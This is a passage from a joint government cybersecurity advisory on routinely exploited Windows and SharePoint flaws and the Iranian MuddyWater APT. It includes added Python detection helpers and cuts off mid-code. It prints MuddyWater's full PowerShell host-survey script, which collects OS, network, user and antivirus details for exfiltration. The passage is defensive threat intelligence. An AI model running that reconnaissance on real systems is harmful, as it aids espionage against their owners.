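            hits.append((entry["c-ip"], entry["cs-method"], entry["cs-uri-stem"], findings))
    return hits


if __name__ == "__main__":
    for ip, method, stem, findings in triage(SAMPLE_IIS_LOG):
        print(f"{ip} {method} {stem}: {'; '.join(findings)}")
```

A GET to `picker.aspx` is deliberately not flagged: the page is served legitimately, and the advisory's concern is the deserialization path, which is reached by POST. Each hit is a lead for the log review ACSC Advisory 2019-125 and Advisory 2020-004 describe, not proof of compromise; pair it with the version check and a look at the Layouts folder before escalating.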
_**References**_

 * [Microsoft – SharePoint Remote Code Execution Vulnerability Security Advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>)
 * [NIST NVD Vulnerability Detail: CVE-2019-0604](<https://nvd.nist.gov/vuln/detail/cve-2019-0604>)
 * [ACSC Advisory 2019-125: Targeting of Microsoft SharePoint CVE-2019-0604](<https://www.cyber.gov.au/acsc/view-all-content/advisories/acsc-advisory-2019-125-targeting-microsoft-sharepoint-cve-2019-0604>)
 * [NCSC Alert: Microsoft SharePoint Remote Code Vulnerability](<https://www.ncsc.gov.uk/news/alert-microsoft-sharepoint-remote-code-vulnerability>)

_Table 14: CVE-2020-0787 Vulnerability Details_

**Windows Background Intelligent Transfer Service Elevation of Privilege (CVE-2020-0787)**

_**Vulnerability Description**_

The Windows Background Intelligent Transfer Service (BITS) is vulnerable to a privilege elevation vulnerability if it improperly handles symbolic links. An actor can exploit this vulnerability to execute arbitrary code with system-level privileges.

_**CVSS 3.0**_

High

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

To exploit this vulnerability, an actor would first need to have the ability to execute arbitrary code on a vulnerable Windows host.

Actors exploiting this vulnerability commonly used the proof of concept code released by the security researcher who discovered the vulnerability.
If an actor left the proof of concept exploit’s working directories unchanged, then the presence of the following folders could be used as an indicator of exploitation:

 * `C:\Users\<username>\AppData\Local\Temp\workspace`
 * `C:\Users\<username>\AppData\Local\Temp\workspace\mountpoint`
 * `C:\Users\<username>\AppData\Local\Temp\workspace\bait`

_The exploit was used in Maze and Egregor ransomware campaigns._

_**Fix**_

[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787>)

_**Recommended Mitigations**_

 * Apply the security updates as recommended in the Microsoft BITS security advisory.

_**Detection Methods**_

 * The patch level of all Microsoft Windows installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft BITS security advisory.

_**Vulnerable Technologies and Versions**_

Windows 7 for 32-bit and x64-based Systems Service Pack 1, 8.1 for 32-bit and x64-based systems, RT 8.1, 10 for 32-bit and x64-based Systems, 10 1607 for 32-bit and x64-based Systems, 10 1709 for 32-bit and x64-based and ARM64-based Systems, 10 1803 for 32-bit and ARM64-based and x64-based Systems, 10 1809 for 32-bit and ARM64-based and x64-based Systems, 10 1903 for 32-bit and ARM64-based and x64-based Systems, and 10 1909 for 32-bit and ARM64-based and x64-based Systems are vulnerable.

Windows Server 2008 R2 for x64-based Systems Service Pack 1, 2008 R2 for x64-based Systems Service Pack 1 (Server Core Installation), 2008 for 32-bit Systems Service Pack 2, 2008 for 32-bit Systems Service Pack 2 (Server Core Installation), 2012, 2012 (Server Core Installation), 2012 R2, 2012 R2 (Server Core Installation), 2016, 2016 (Server Core Installation), 2019, 2019 (Server Core Installation), 1803 (Server Core Installation), 1903 (Server Core Installation), and 1909 (Server Core Installation) are also vulnerable.
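Two of the indicators in these tables are filesystem artifacts rather than log entries: Table 14's `workspace`, `workspace\mountpoint` and `workspace\bait` folders under a user's `Temp` directory, and Table 13's web shells dropped into the SharePoint Layouts folder. The Python below is an added example, not part of the advisory; it sweeps every profile under a `Users` root for the Table 14 folders and lists server-side pages in a Layouts directory that are absent from a known-good baseline. The baseline is an assumption of this example (you would take it from a clean install of the same SharePoint build); the directory tree the demo walks is constructed in a temporary directory, and `unexpected.aspx` is a made-up file name standing in for an unexplained page, not an indicator from the advisory.

```python
import tempfile
from pathlib import Path
from typing import Dict, Iterable, List

# Working directories the public proof of concept for CVE-2020-0787 leaves behind
# when run with its defaults (Table 14), relative to <profile>\AppData\Local\Temp.
BITS_POC_FOLDERS = (("workspace",), ("workspace", "mountpoint"), ("workspace", "bait"))

# Extensions IIS executes as server-side pages; anything else in Layouts is left alone here.
SERVER_PAGE_SUFFIXES = (".aspx", ".ashx", ".asmx")


def scan_bits_poc_artifacts(users_root: Path) -> Dict[str, List[str]]:
    """Map profile name -> PoC folders found in its Temp directory (profiles with none are omitted).

    On Windows, users_root would be C:\\Users; the demo points it at a constructed tree.
    """
    findings: Dict[str, List[str]] = {}
    if not users_root.is_dir():
        return findings
    for profile in sorted(p for p in users_root.iterdir() if p.is_dir()):
        temp = profile / "AppData" / "Local" / "Temp"
        present = ["/".join(parts) for parts in BITS_POC_FOLDERS if temp.joinpath(*parts).is_dir()]
        if present:
            findings[profile.name] = present
    return findings


def find_unexpected_layouts_pages(layouts_dir: Path, baseline: Iterable[str]) -> List[str]:
    """Server-side pages in a SharePoint Layouts folder that are not in the known-good baseline.

    Table 13 notes web shells were commonly dropped here; the baseline (assumed to be
    maintained by the operator) should list the page names from a clean install.
    """
    known = {name.lower() for name in baseline}
    if not layouts_dir.is_dir():
        return []
    return sorted(p.name for p in layouts_dir.iterdir()
                  if p.is_file() and p.suffix.lower() in SERVER_PAGE_SUFFIXES
                  and p.name.lower() not in known)


def build_constructed_tree(root: Path) -> None:
    """Constructed layout for the demo: one clean profile, one showing the PoC folders,
    and a Layouts folder holding two baseline pages plus one page outside the baseline.
    None of these are real artifacts."""
    (root / "Users" / "alice" / "AppData" / "Local" / "Temp").mkdir(parents=True)
    bob_temp = root / "Users" / "bob" / "AppData" / "Local" / "Temp"
    for parts in BITS_POC_FOLDERS:
        bob_temp.joinpath(*parts).mkdir(parents=True, exist_ok=True)
    layouts = root / "Layouts"
    layouts.mkdir()
    for name in ("picker.aspx", "error.aspx", "unexpected.aspx"):
        (layouts / name).write_text("<%@ Page %>")  # placeholder content only


def demo() -> Dict[str, object]:
    """Build the constructed tree in a temp dir, run both sweeps, return their results."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_constructed_tree(root)
        return {
            "bits": scan_bits_poc_artifacts(root / "Users"),
            "layouts": find_unexpected_layouts_pages(root / "Layouts", ("picker.aspx", "error.aspx")),
        }


if __name__ == "__main__":
    results = demo()
    for profile, folders in results["bits"].items():
        print(f"{profile}: CVE-2020-0787 PoC folders present: {', '.join(folders)}")
    for page in results["layouts"]:
        print(f"Layouts page outside baseline: {page}")
```

The BITS sweep is only as good as Table 14's caveat: an actor who renamed the proof of concept's working directories leaves none of these folders, so an empty result does not clear a host. A page outside the Layouts baseline is a file to examine (owner, timestamps, content), not a verdict by itself.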
_**References**_

 * [Microsoft – Windows Background Intelligent Transfer Service Elevation of Privilege Security Advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787>)
 * [NIST NVD Vulnerability Detail: CVE-2020-0787](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>)
 * [Security Researcher – Proof of Concept Exploit Code](<https://itm4n.github.io/cve-2020-0787-windows-bits-eop/>)

_Table 15: CVE-2020-1472 Vulnerability Details_

**Microsoft Netlogon Elevation of Privilege (CVE-2020-1472)**

_**Vulnerability Description**_

The Microsoft Windows Netlogon Remote Protocol (MS-NRPC) reuses a known, static, zero-value initialization vector (IV) in AES-CFB8 mode, which could allow an unauthenticated attacker to impersonate a domain-joined computer, including a domain controller, and potentially obtain domain administrator privileges.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

To exploit this vulnerability, an actor would first need to have an existing presence on an internal network with network connectivity to a vulnerable Domain Controller, assuming that Domain Controllers are not exposed to the internet.

The immediate effect of successful exploitation is the ability to authenticate to the vulnerable Domain Controller with Domain Administrator level credentials.
In compromises exploiting this vulnerability, exploitation was typically followed immediately by dumping all hashes for Domain accounts.

Threat actors were seen combining the MobileIron CVE-2020-15505 vulnerability for initial access, then using the Netlogon vulnerability to facilitate lateral movement and further compromise of target networks.

_A nation-state APT group has been observed exploiting this vulnerability._[[18](<https://www.cyber.nj.gov/alerts-advisories/apt10-adds-zerologon-exploitation-to-ttps>)]

_**Fix**_

[Patch Available](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>)

_**Recommended Mitigations**_

 * Apply the security updates as recommended in the Microsoft Netlogon security advisory.

_**Detection Methods**_

 * The patch level of Domain Controllers should be reviewed for the presence of relevant security updates as outlined in the Microsoft Netlogon security advisory.
 * Reviewing and monitoring Windows Event Logs can identify potential exploitation attempts. However, further investigation would still be required to eliminate legitimate activity. Further information on these event logs is available in the [ACSC 2020-016 Advisory](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>).

_**Vulnerable Technologies and Versions**_

At the time of the vulnerability release, the following Microsoft Windows Server versions were vulnerable: all versions of Windows Server 2019; all versions of Windows Server 2016; Windows Server 2012 R2; Windows Server 2012; Windows Server 2008 R2 SP1; and Windows Server versions 1909/1903/1809.
_**References**_

 * [Microsoft – Netlogon Elevation of Privilege Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)
 * [NIST NVD Vulnerability Detail: CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/cve-2020-1472>)
 * [ACSC 2020-016 Netlogon Advisory](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>)
 * [CISA-FBI Joint Cybersecurity Advisory: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)
 * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)
 * [ACSC Advisory 2020-016: "Zerologon" – Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>)
 * [NCSC Alert: UK Organisations Should Patch Netlogon Vulnerability (Zerologon)](<https://www.ncsc.gov.uk/news/alert-organisations-should-patch-netlogon-vulnerability>)

For additional general best practices for mitigating cyber threats, see the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) and ACSC’s [Essential Eight](<https://www.cyber.gov.au/acsc/view-all-content/essential-eight>) mitigation strategies.

### Additional Resources

#### Free Cybersecurity Services

CISA offers several free cyber hygiene vulnerability scanning and web application services to help U.S. federal agencies, state and local governments, critical infrastructure, and private organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. For more information about [CISA’s free services](<https://www.cisa.gov/cyber-hygiene-services>), or to sign up, email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>).

#### Cyber Essentials

[CISA’s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>) is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.

#### Cyber.gov.au

[ACSC’s website](<https://www.cyber.gov.au/>) provides advice and information about how to protect individuals and families, small- and medium-sized businesses, large organizations and infrastructure, and government organizations from cyber threats.

#### ACSC Partnership Program

The ACSC Partnership Program enables Australian organizations and individuals to engage with ACSC and fellow partners, drawing on collective understanding, experience, skills, and capability to lift cyber resilience across the Australian economy.

Australian organizations, including government and those in the private sector, as well as individuals, are welcome to sign up at [Become an ACSC partner](<https://www.cyber.gov.au/partner-hub/become-a-partner>) to join.

#### NCSC 10 Steps

The NCSC offers [10 Steps to Cyber Security](<https://www.ncsc.gov.uk/collection/10-steps>), providing detailed guidance on how medium and large organizations can manage their security.

On vulnerabilities specifically, the NCSC has [guidance to organizations on establishing an effective vulnerability management process](<https://www.ncsc.gov.uk/guidance/vulnerability-management>), focusing on the management of widely available software and hardware.

### Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:Central@cisa.gov>).

### References

[[1] NSA-CISA-FBI Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)

[[2] CISA-FBI-NSA-NCSC Advisory: Further TTPs Associated with SVR Cyber Actors](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>)

[[3] NSA Cybersecurity Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)

[[4] ACSC Advisory 2020-001-4: Remediation for Critical Vulnerability in Citrix Application Delivery Controller and Citrix Gateway](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2020-001-4-remediation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway>)

[[5] NCSC Alert: Actors Exploiting Citrix Products Vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)

[[6] Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)

[[7] CISA-FBI Joint Cybersecurity Advisory: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)

[[8] ACSC Alert: APT Exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)

[[9] NCSC Alert: Critical Risk to Unpatched Fortinet VPN Devices](<https://www.ncsc.gov.uk/news/critical-risk-unpatched-fortinet-vpn-devices>)

[[10] NSA Cybersecurity Advisory: Mitigating Recent VPN Vulnerabilities](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf>)

[[11] NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)

[[12] NCSC-Canada’s Communications Security Establishment-NSA-CISA Advisory: APT29 Targets COVID-19 Vaccine Development (CSE)](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)

[[13] ACSC Advisory: Summary of Tactics, Techniques and Procedures Used to Target Australian Networks](<https://www.cyber.gov.au/acsc/view-all-content/advisories/summary-tactics-techniques-and-procedures-used-target-australian-networks>)

[[14] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)

[[15] CISA Alert: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)

[[16] CISA Emergency Directive (ED 20-03): Windows DNS Server Vulnerability](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)

[[17] NCSC Alert: Multiple Actors are Attempting to Exploit MobileIron Vulnerability CVE-2020-15505](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>)

[[18] NJCCIC Alert: APT10 Adds ZeroLogon Exploitation to TTPs](<https://www.cyber.nj.gov/alerts-advisories/apt10-adds-zerologon-exploitation-to-ttps>)

### Revisions

 * Initial Version: July 28, 2021
 * August 4, 2021: Fixed typo
 * August 20, 2021: Adjusted vendor name for CVE-2020-1472

Source: [Top Routinely Exploited Vulnerabilities (AA21-209A)](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a>), last modified August 20, 2021.

---

### Summary

**Actions to Take Today to Protect Against Malicious Activity**
* Search for indicators of compromise.
* Use antivirus software.
* [Patch](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) all systems.
* Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).
* Train users to recognize and report [phishing attempts](<https://us-cert.cisa.gov/ncas/tips/ST04-014>).
* Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).

_**Note:** this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v10/techniques/enterprise/>) for all referenced threat actor tactics and techniques._

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America.
**Note:** MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.

MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[[1](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.

MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their malicious activity.

This advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks.

FBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information.
**Note:** also see the Additional Resources section.

 * Malware Analysis Report – [MAR-10369127-1.v1: MuddyWater](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>)
 * IOCs – AA22-052A.stix and MAR-10369127-1.v1.stix
 * CISA's webpage – [Iran Cyber Threat Overview and Advisories](<https://www.cisa.gov/uscert/iran>)
 * [NCSC-UK MAR – Small Sieve](<https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf>)
 * [CNMF's press release – Iranian intel cyber suite of malware uses open source tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)

### Technical Details

FBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks.

As part of its spearphishing campaign, MuddyWater attempts to coax its targeted victims into downloading ZIP files containing either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious file to the victim’s network [[T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001/>), [T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002>)]. MuddyWater actors also use techniques such as side-loading DLLs [[T1574.002](<https://attack.mitre.org/versions/v10/techniques/T1574/002/>)] to trick legitimate programs into running malware and obfuscating PowerShell scripts [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>)] to hide C2 functions [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027/>)] (see the PowGoop section for more information).
Additionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS—for loading malware, backdoor access, persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)], and exfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)]. See below for descriptions of some of these malware sets, including newer tools or variants to the group’s suite. Additionally, see Malware Analysis Report [MAR-10369127.r1.v1: MuddyWater](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>) for further details.

#### **PowGoop**

MuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.

According to samples of PowGoop analyzed by [CISA](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>) and [CNMF](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>), PowGoop consists of three components:

 * A DLL file renamed as a legitimate filename, `Goopdate.dll`, to enable the DLL side-loading technique [[T1574.002](<https://attack.mitre.org/versions/v10/techniques/T1574/002/>)]. The DLL file is contained within an executable, `GoogleUpdate.exe`.
 * A PowerShell script, obfuscated as a .dat file, `goopdate.dat`, used to decrypt and run a second obfuscated PowerShell script, `config.txt` [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>)].
 * `config.txt`, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.

These components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service.
#### **Small Sieve**

According to a sample [analyzed by NCSC-UK](<https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf>), Small Sieve is a simple Python [[T1059.006](<https://attack.mitre.org/versions/v10/techniques/T1059/006/>)] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, `gram_app.exe`. The NSIS installer installs the Python backdoor, `index.exe`, and adds it as a registry run key [[T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>)], enabling persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)].

MuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., "Microsift") and Outlook in its filenames associated with Small Sieve [[T1036.005](<https://attack.mitre.org/versions/v10/techniques/T1036/005/>)].

Small Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [[TA0005](<https://attack.mitre.org/versions/v10/tactics/TA0005/>)] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve’s beacons and taskings are performed using the Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [[T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001>)], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>), [T1132.002](<https://attack.mitre.org/versions/v10/techniques/T1132/002/>)].

**Note:** cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence.
See Appendix B for further analysis of Small Sieve malware.

#### **Canopy**

MuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [[T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001>)]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. **Note:** the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence.

In the samples CISA analyzed, a malicious Excel file, `Cooperation terms.xls`, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [[T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002/>)]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.

The first .wsf is installed in the current user startup folder [[T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>)] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027/>)]. The file executes a command to run the second .wsf.

The second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [[TA0035](<https://attack.mitre.org/versions/v10/tactics/TA0035/>)] the victim system’s IP address, computer name, and username [[T1005](<https://attack.mitre.org/versions/v10/techniques/T1005/>)].
The collected data is then hex-encoded and sent to an adversary-controlled IP address, `http[:]88.119.170[.]124`, via an HTTP POST request [[T1041](<https://attack.mitre.org/versions/v10/techniques/T1041/>)].

#### **Mori**

MuddyWater also uses the Mori backdoor, which uses Domain Name System tunneling to communicate with the group’s C2 infrastructure [[T1572](<https://attack.mitre.org/versions/v10/techniques/T1572/>)].

According to one sample analyzed by CISA, `FML.dll`, Mori uses a DLL written in C++ that is executed with `regsvr32.exe` with export `DllRegisterServer`; this DLL appears to be a component of another program. `FML.dll` contains approximately 200MB of junk data [[T1001.001](<https://attack.mitre.org/versions/v10/techniques/T1001/001/>)] in a resource directory 205, number 105. Upon execution, `FML.dll` creates a mutex, `0x50504060`, and performs the following tasks:

 * Deletes the file `FILENAME.old` and deletes a file by registry value. The filename is the DLL file with a `.old` extension.
 * Resolves networking APIs from strings that are ADD-encrypted with the key `0x05`.
 * Uses Base64 and JavaScript Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.
 * Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [[T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001/>)].
 * Reads and/or writes data from the following Registry Keys: `HKLM\Software\NFC\IPA` and `HKLM\Software\NFC\(Default)`.

#### **POWERSTATS**

This group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059>)].
CNMF has posted samples further detailing the different parts of MuddyWater’s new suite of tools—along with JavaScript files used to establish connections back to malicious infrastructure—to the malware aggregation tool and repository, [VirusTotal](<http://www.virustotal.com/en/user/CYBERCOM_Malware_Alert>). Network operators who identify multiple instances of the tools on the same network should investigate further, as this may indicate the presence of an Iranian malicious cyber actor.

MuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability ([CVE-2020-1472](<https://vulners.com/cve/CVE-2020-1472>)) and the Microsoft Exchange memory corruption vulnerability ([CVE-2020-0688](<https://vulners.com/cve/CVE-2020-0688>)). See [CISA’s Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for additional vulnerabilities with known exploits and the joint Cybersecurity Advisory [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>) for additional Iranian APT group-specific vulnerability exploits.

#### **Survey Script**

The following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine and builds a single string from the results, with the fields separated by a delimiter (`;;` in this sample).
The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.

```powershell
# Host survey: each collected field is appended to $S, separated by ";;"
$O = Get-WmiObject Win32_OperatingSystem
$S = $O.Name                                                    # OS name and boot path
$S += ";;"
$ips = ""
Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | % { $ips = $ips + ", " + $_.IPAddress[0] }
$S += $ips.substring(1)                                         # IP list, leading comma dropped
$S += ";;"
$S += $O.OSArchitecture
$S += ";;"
$S += [System.Net.DNS]::GetHostByName('').HostName              # host FQDN
$S += ";;"
$S += ((Get-WmiObject Win32_ComputerSystem).Domain)
$S += ";;"
$S += $env:UserName
$S += ";;"
# Registered antivirus products, read from the Security Center WMI namespace
$AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct -ComputerName $env:computername
$resAnti = @()
foreach ($AntiVirusProduct in $AntiVirusProducts) { $resAnti += $AntiVirusProduct.displayName }
$S += $resAnti
echo $S
```

#### **Newly Identified PowerShell Backdoor**

The newly identified PowerShell backdoor used by MuddyWater, shown below, uses a single-byte Exclusive-OR (XOR) with the key 0x02 to encrypt communications with adversary-controlled infrastructure.
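The following helper is an added example, not code from the advisory or its authoring agencies. It mirrors the backdoor's channel transform (UTF-8 → XOR with 0x02 → Base64) so that a captured response body or `cookie` header can be read back to plaintext, and splits a recovered survey string on the `;;` delimiter used by the survey script above. The proxy-log format, hosts, identifiers and values in `SAMPLE_LOG` are constructed for the example.

```python
"""Triage helper for the XOR-0x02/Base64 C2 channel and the ';;' survey string
described in this advisory (added example; log format and all values constructed)."""
import base64
import binascii
import re
from typing import List, Optional

XOR_KEY = 0x02          # single-byte key used by the sample backdoor
SURVEY_DELIM = ";;"     # field separator used by the sample survey script
# Field order produced by the survey script, in the order it appends them
SURVEY_FIELDS = ("os", "ips", "arch", "hostname", "domain", "user", "av")


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def decode_channel(b64_text: str, key: int = XOR_KEY) -> str:
    """Inverse of the backdoor's decode()/encode() pair: Base64 -> XOR -> UTF-8.
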